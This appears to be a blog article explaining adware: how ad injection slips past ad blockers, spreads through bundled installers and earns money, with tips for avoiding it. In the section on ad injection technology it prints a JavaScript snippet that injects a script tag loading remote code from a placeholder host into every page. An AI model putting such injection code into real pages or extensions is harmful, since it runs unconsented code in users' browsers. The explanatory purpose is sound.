Adware: Why Your Ad Blocker Isn’t Blocking Ads and How to Fix It

Remove adware

You’ve been using an ad blocker for a while. All the ads that bothered you before are gone. It’s glorious.

Until you see an ad.

Your knee-jerk reaction is that your ad blocker has stopped working or that something has gone wrong. Sometimes this is exactly the case, especially, if an ad blocker isn’t in your list of programs that launch on Windows startup.

But what if your ad blocker is running as usual when you see a banner ad or pop-up? Worse yet—what if this ad appears on a website or page that, based on general knowledge, never displays ads?

A quick Google search yields suspicious results, tabs that self-open, and loads of advertisements. You have adware.

Adware injecting an ad on Google homepage
Adware injecting an ad on Google homepage

What Is Adware?

Search settings modified by Adware lead to rogue search engine
Search settings modified by Adware lead to rogue search engine

It may seem that all these ads and browser redirections are coming from the web, but in reality they’re triggered internally from your PC by a type of malicious (unwanted) program, called  “adware”. These apps or extensions are using so called “ad injection” techniques to serve ads directly in your browser and they easily circumvent ad blocking software.

By definition adware is an application/extension that uses ad display in order to support itself and its authors. Technically, any ad supported software may be classified as “adware”, even Skype! Afterall, it does show the ads to users and completely falls under this category. There are tons of legitimate ad supported apps, however. So for the sake of clarity we will define adware according to Microsoft Malware Protection Center

“The software runs unwanted processes or programs on your PC, does not display adequate disclosures about its behavior or obtain adequate consent, prevents you from controlling its actions while it runs on your computer, prevents you from uninstalling or removing the program, prevents you from viewing or modifying browser features or settings, makes misleading or inaccurate claims about the state of your PC, or circumvents user consent dialogs from the browser or operating system.”

 

The same document clarifies the differences between unwanted software and various types of malware:

“Malicious software is the general name for programs that perform malicious actions on your PC. This can include stealing your personal information, locking your PC until you pay a ransom, using your PC to send spam, or downloading other malicious software.”

There is a fine line between adware and malware, since some adware samples demonstrate traits of malicious programs. In general, every antivirus company has its own definition of Potentially Unwanted Software.

Adware has been around for years and, along with malvertising, is one of the persistent challenges for online advertisers and Internet users alike. Let’s take a closer look at how adware operates and distributes as well as its subterranean mechanisms and economy which is rarely brought into the spotlight.

How  Does Adware Get on My PC, If I Have an Antivirus (AV) Software Installed?

Because of ambiguous definitions, a lot of adware or “crapware” is actually legal and can’t be detected as malware by antivirus companies due to possible lawsuits. Le sigh—being annoying isn’t a crime. In an attempt to safeguard their users from these apps, antivirus companies coined a term “Potentially unwanted software”.  Depending on the vendor, some of them prominently disclose adware apps as such during the download/installation attempt. The final decision is up to the user.

ESET dialogue box, notyfying user about potentially unwanted program
ESET dialogue box, notifying user about potentially unwanted program

rolling out new adware and quickly distributing it, adware authors seize the window of opportunity to capitalize on a specific sample before it is detected by most AVs. They have a lot on their plate with the rise of ransomware, exploit kits and persistent threats to businesses. Despite how frustrating it is, adware is still considered a lesser evil.

How Does Adware Work? It’s All About Ad injection

Because ad injection occurs entirely on the end user’s  browser, website owners are completely unaware of the ads you are seeing on their website.

This is true for small and large websites alike—and it’s ubiquitous.

According to Google’s 2014 study of users’ page code, 89% of 102.5 million had traces of changes made to the browsers’ code by third-party actors. Also that year, Google started to impose regulations on extensions in their Chrome Web Store—a total of 50,000 potentially harmful ad supported extensions were removed.  

Adware components are so common partly because ad injection technology grants a lot of flexibility to adware authors in terms of the advertising formats they can use to deliver ads. Most popular formats:

  • Banner (static or animated)
Ad injection on Wikipedia page
Ad injection on Wikipedia page
  • Pop up/pop under
  • Interstitial ad (appears on page load)
  • Text ads (can be injected on to search engine results pages)
  • New tab ad/Redirect (unauthorized tab opening)
New tab/Redirect adware attacking the browser Source: Bleeping Computer.com
New tab/Redirect adware attacking the browser Source: Bleeping Computer.com
  • Search hijackers (change default search settings, redirect user searches)
  • DNS hijacking to modify browser content, using MitM attack and rogue SSL certificate.
DNS hijacking attack explained
DNS hijacking attack explained

Ad Injection Technology

It is worth mentioning that ad injection doesn’t depend on the availability of free space on the targeted website. By design,injected ads may cover legitimate ads. In this case, both legitimate advertisers and site owners incur losses.

Here’s how the technology works

Ad injection occurs during page rendering when Javascript code is put into browser pages. Harmful code alters a page’s DOM (Document Object Model) Code as executed in <head>, <body> tags.

Here’s an example:

(function() { var e=document.createElement(‘script’); e.src = (‘https:’ == document.location.protocol ? ‘https://’ : ‘http://’) + ‘http://cvrsw-c.b/sd/xxx/xxx.js‘; document.body.appendChild(e); }  )();

Basically, by executing this code on every page in user’s browser, the code’s author is able to serve ads the browser. Distributing the app/extension that serves as a carrier for the code, the author may acquire access to even more browsers that may serve as ad placements.

Adware Distribution Channels

As discussed earlier, the lifetime of an adware app is limited by AVs and regulators like Google and Microsoft that may influence its distribution on a platform level (browsers). So if adware authors are serious about earning money (and they are) some covert and massive methods are required.

One of the most common ways to spread adware is through software bundling. Users may install an adware app along with a software product that they actually wanted. Bundled apps are offered inside of the installer for the carrier software, after the carrier install is initiated. In most cases, adware apps fail to provide prominent notice about their business model and can even deceive users by claiming to be completely free. Another common installer piggyback technique is pre-checked consent dialog boxes in the installer that users overlook. What is more, carrier software owners often earn a certain amount for each initiated install of adware.

Here’s an example of carrier (KC Software) offering an installation of well known adware named Babylon toolbar and browser search hijacker.

Adware distribution through software bundling
Adware distribution through software bundling

Bundled app distribution is relatively cheap; the install price varies from $0.08 to $2, depending on the geographic area (Windows OS). Every week over 160 software families are distributed through bundled installs, powered by Pay Per Install networks and standalone carriers. Adware constitutes nearly 60% of the whole segment. Google detects around 60 million bundled adware downloads by their Safe Browsing Tool. But that’s just Google and only on Chrome.

Like many other things on the Internet, bundling is just a distribution channel, so not all companies that distribute software this way are rogue. Large companies like Google and Adobe provide complete user control and choice.

Besides bundling, other attack vectors for adware are: “free multimedia” apps, comprised of Facebook apps and messengers (including Facebook Messenger). Free multimedia apps are used to spread adware by massive messaging through the contacts of compromised accounts.  

The Shadow Economy of the Adware Industry

The truly massive distribution of ad injection products creates an equally large traffic segment and an enormous opportunity to cash in.

Just how much dough are we talking about?  

Let’s say an adware author purchases a healthy 100K installs at $1.50 (US) with an acceptance rate (take rate) of 0.75—an ok rate since some installs are lost due to antiviruses detections and other factors. This yields 75K valid installs and expenses of 150K. If we assume an average ad impression caps (50 per day) and an average lifespan of an adware product with a modest $10 CPM (cost per 1000 ad impressions), the expected revenue is staggering.

75000x50x7 = 26,250,000 ad impressions at $10 CPM = $262,500 in gross revenue and 175% initial return on investment (ROI).

If that doesn’t surprise you. It should.

Furthermore, this is hardly all of the earnings of an adware author.

Access to victims PCs allows capture of massive amounts of data that later can be sold.

As a publisher, the adware author will try to sell his ad impressions at highest possible price. It is likely that he may sell traffic programmatically through supply-side platforms or directly to ad injection libraries that resell ad injector’s traffic to their clients through real-time auction. In many cases, an ad injection library is the same entity as the adware author. Here’s the list of the largest ones from Google’s report.

Top ad injection libraries supplying
Top ad injection libraries

 Wait. Who’s buying this sort of traffic?

Remember that adware can inject itself on to any of the top sites like Youtube or CNN.com. In some cases, this traffic will be sold to brands that have hired agencies to manage advertising campaigns. Since it’s really hard to expect high visibility with such media buys, brands may not  know the origin of this “premium inventory”.  This is a considerable risk for brand safety to both customers and competitors.

It’s highly doubtful that Best Buy’s marketing department would want such publicity.

Best Buy's ads injected on Dell website
Best Buy’s ads injected on Dell website

Yet, for some direct response advertisers ad injection traffic is acceptable. Mostly due to the various ad formats and targeting possibilities, including:

  • Contextual targeting (Reaching a person at the right time, by search query, browser address string, or a page’s meta tags)
  • (Large) Audience size with some segmentation by operating system, geography, browser, etc.

Who’s The Biggest Loser in This Story?

Well, users and websites of course. 

Websites’ reputations suffer as well as ad revenues, since their legitimate advertisers are getting less and less exposure.

Users suffer because their web experience deteriorates, and they are rarely able to defeat adware on their own. Privacy risks arising from data collection are included.

How To Stay Away From Adware

 

  • Use an ad blocker with extra privacy features, like anti-phishing. In case you encounter adware, it may block redirects to harmful sites.
  • Keep your OS and browsers updated.
  • Use an AV and Adwcleaner utility.
  • Use Unchecky to make sure that no consent dialogs are missed.

 

 

Share